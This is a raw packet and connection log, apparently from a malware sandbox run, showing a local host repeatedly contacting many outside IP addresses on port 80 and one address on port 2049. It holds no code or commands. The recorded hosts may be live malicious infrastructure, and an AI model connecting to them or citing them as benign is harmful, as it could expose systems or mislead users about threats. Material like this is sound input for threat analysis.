                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:20.982728958 CET5950980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:20.982805967 CET5950980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:20.987684011 CET805950944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.034197092 CET204959511212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.034288883 CET595112049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.034518957 CET595112049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.192059994 CET5951680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.197048903 CET805951618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.197150946 CET5951680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.197280884 CET5951680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.197313070 CET5951680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.202111959 CET805951618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.202124119 CET805951618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.628385067 CET805951618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.628576040 CET5951680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.633943081 CET805951618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.634051085 CET5951680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.934393883 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.940927029 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.941021919 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.941175938 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.941194057 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.947707891 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.947854996 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:23.629692078 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:23.629772902 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:23.655586958 CET5952780192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:23.660419941 CET8059527172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.326018095 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.412199974 CET805948782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.412293911 CET5948780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.412389994 CET5948780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.413327932 CET805948782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.413518906 CET5948780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415529966 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415627003 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415813923 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.415838957 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.417680025 CET805948782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.421446085 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.421602964 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.436799049 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.441766024 CET805953582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.441840887 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.441998959 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.442027092 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.447076082 CET805953582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:24.447088003 CET805953582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.080126047 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.080774069 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.080802917 CET5953480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.086479902 CET8059534172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.284511089 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.289597988 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.291838884 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.292009115 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.292026997 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.296811104 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.296823025 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.046432018 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.051265955 CET204959544212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.055134058 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.057548046 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.062865019 CET204959544212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.266257048 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.266714096 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.271989107 CET805953834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.275146961 CET5953880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.547831059 CET204959544212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.547929049 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.548192024 CET595442049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.582591057 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590200901 CET805955018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590286016 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590785980 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.590785980 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.597081900 CET805955018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.597095966 CET805955018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.263700962 CET805955018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.263907909 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.269330978 CET805955018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.269407034 CET5955080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.492813110 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.930094004 CET8059556208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.930203915 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.930447102 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.930470943 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.937505007 CET8059556208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.937546015 CET8059556208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.568125963 CET8059556208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.608021021 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.608048916 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.613437891 CET8059556208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.613475084 CET8059556208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.753660917 CET8059556208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.809678078 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.981244087 CET5956280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.989428043 CET805956213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.989510059 CET5956280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.989689112 CET5956280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.989715099 CET5956280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.994649887 CET805956213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.994662046 CET805956213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:30.456079960 CET805956213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:30.470071077 CET5956280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:30.475493908 CET805956213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:30.475600004 CET5956280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.561675072 CET595732049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.855550051 CET204959573212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.855715036 CET595732049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.856035948 CET595732049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.861722946 CET204959573212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.963349104 CET5957480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.968854904 CET805957444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.968936920 CET5957480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.969162941 CET5957480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.969263077 CET5957480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.974077940 CET805957444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.974211931 CET805957444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.350879908 CET204959573212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.350955963 CET595732049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.351268053 CET595732049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.630348921 CET805957444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.630609035 CET5957480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.636495113 CET805957444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.637943029 CET5957480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.823600054 CET5958080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.828491926 CET805958054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.828733921 CET5958080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.828912020 CET5958080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.828931093 CET5958080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.833791018 CET805958054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.834445000 CET805958054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.930636883 CET805953582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.933142900 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.933346987 CET5953580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.938445091 CET805953582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.978509903 CET5958680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.983445883 CET805958647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.985719919 CET5958680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.985902071 CET5958680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.985923052 CET5958680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.991097927 CET805958647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.991142988 CET805958647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.667948961 CET805958054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.711565018 CET5958080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.716882944 CET805958054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.716948986 CET5958080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.994590998 CET5959280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.999645948 CET805959235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.999737024 CET5959280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.999886990 CET5959280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.999911070 CET5959280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.005547047 CET805959235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.005561113 CET805959235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.413471937 CET805958647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.413665056 CET5958680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.422959089 CET805958647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.423046112 CET5958680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.453665972 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.458767891 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.458843946 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.459052086 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.459069967 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.463926077 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.463983059 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.824301958 CET805959235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.824505091 CET5959280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.829754114 CET805959235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.829819918 CET5959280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.014417887 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019344091 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019428968 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019838095 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.019853115 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.024815083 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.025048018 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.692034006 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.729100943 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.730952978 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.731091022 CET5959980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.734189034 CET80595993.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.878051043 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.881139994 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.887043953 CET805959313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.887130022 CET5959380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.528209925 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.533479929 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.533575058 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.533978939 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.534085989 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.538768053 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.539421082 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.545944929 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.550949097 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.551304102 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.551304102 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.551331997 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.556308031 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.556816101 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.215595007 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.215989113 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.221389055 CET805960544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.221463919 CET5960580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.233697891 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.246969938 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.251883984 CET805961118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.251950026 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.252228022 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.252252102 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.257061958 CET805961118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.257500887 CET805961118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.267164946 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.267232895 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.272178888 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.272253990 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.358717918 CET596122049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.363702059 CET204959612212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.363797903 CET596122049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.364109039 CET596122049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.368983984 CET204959612212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.442312002 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.497061968 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.638536930 CET5961880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.643501043 CET805961854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.643608093 CET5961880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.643802881 CET5961880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.643973112 CET5961880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.648655891 CET805961854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.648837090 CET805961854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.850202084 CET204959612212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.850280046 CET596122049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.850547075 CET596122049192.168.2.5212.162.149.53
